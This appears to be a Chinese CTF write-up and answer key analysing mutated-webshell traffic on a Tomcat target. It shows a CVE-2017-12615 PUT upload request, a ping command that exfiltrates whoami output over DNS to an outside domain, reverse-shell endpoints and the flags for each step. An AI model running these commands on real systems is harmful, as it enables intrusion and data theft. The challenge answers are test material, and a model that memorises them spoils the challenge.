某变异Webshell流量分析 — 玄机靶场通关笔记题目背景题目不提供 SSH 凭据需要通过渗透手段进入靶机再对 Webshell 流量包进行深度分析还原黑客完整攻击链。靶机入口通过fscan扫描发现52.82.19.202:8081开放 Apache Tomcat存在poc-yaml-iis-put-getshell和poc-yaml-tomcat-cve-2017-12615-rce两个漏洞漏洞利用CVE-2017-12615 上传 WebshellApache Tomcat 7.0.0–7.0.79 在 Windows 下当readonly参数为false时攻击者可通过 HTTP PUT 请求上传任意文件。PUT /lexs.jsp/ HTTP/1.1 Host: 52.83.29.154:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 961 [JSP Webshell payload]上传的 Webshell 文件名为hello.jsp。10 个步骤完整答案步骤题目Flag#1黑客上传的木马文件名是什么flag{hello.jsp}#2黑客上传的木马连接密码是什么flag{SjIHRC7oSVIE}#3分析黑客上传的木马找到木马通讯的 key 是什么flag{oszXCfTeXHpIkMS3}#4黑客连接 webshell 后执行的第一条命令是什么flag{ping -c 1 \whoami.d5454c8975.ipv6.1433.eu.org.}#5这个 webshell 是怎么进行回显的IP/域名flag{d5454c8975.ipv6.1433.eu.org.}#6黑客留下后门的反连 IP 和 PORT 是什么flag{192.168.31.190|2024}#7黑客通过后门反连执行的第一条命令是什么flag{ls}#8后门程序连接的恶意主机 IP 和 PORT 是什么flag{10.10.13.37|4444}#9黑客加密了 /root 目录下一个重要文件解密后的文件内容是什么flag{0ba9af0100c01e88a3a1280ec...}#10找到并修复入口漏洞后运行 /root/check_tomcat 得到的 flagflag{ba5579c780bf4a799e03a60c6...}核心技术分析1. 变异 Webshell 的通信机制这个 Webshell 不是普通的菜刀/蚁剑马而是一个变异加密马通信流量经过三层加密原始命令 → Base64 编码 → AES-ECB 模式加密key: oszXCfTeXHpIkMS3 → Gzip 压缩 → HTTP POST 请求参数名: SjIHRC7oSVIE解密方向流量分析时HTTP 响应体 → Base64 解码 → AES-ECB 解密 → Gzip 解压 → 明文命令输出2. DNS 外带回显技术黑客执行的第一条命令是ping-c1whoami.d5454c8975.ipv6.1433.eu.org.这是一种**DNS 外带DNS Exfiltration**技术通过反引号执行whoami获取当前用户名将用户名拼接到攻击者控制的域名前缀发起 DNS 查询攻击者在 DNS 服务器日志中看到查询记录从而获知命令执行结果这种方式可以绕过无回显的 Webshell 限制3. 后门植入与持久化黑客通过 Webshell 植入了一个反向 Shell 后门本地监听192.168.31.190:2024攻击者内网机器后门连接的 C210.10.13.37:4444后门建立连接后第一条命令是ls用于探测当前目录4. 文件加密与解密黑客对/root目录下的重要文件进行了加密需要找到加密算法和密钥通过流量分析还原解密文件获取原始内容修复 Tomcatreadonlyfalse配置漏洞运行/root/check_tomcat验证修复结果修复建议漏洞修复方案CVE-2017-12615 Tomcat PUT 上传在conf/web.xml中将DefaultServlet的readonly参数改为true或升级至 Tomcat 7.0.81Webshell 后门删除/webapps/ROOT/hello.jsp检查所有 JSP 文件反向 Shell 后门排查异常进程和定时任务清除后门程序弱访问控制限制 Tomcat 管理端口访问配置防火墙规则工具与技术栈流量分析Wireshark / tcpdump加解密CyberChefBase64 AES-ECB Gzip 组合解密Java 字节码反编译javap / jadx还原 shell.java 类漏洞利用CVE-2017-12615 PUT 上传 PoCDNS 外带分析分析 DNS 查询日志还原 OOB 命令执行结果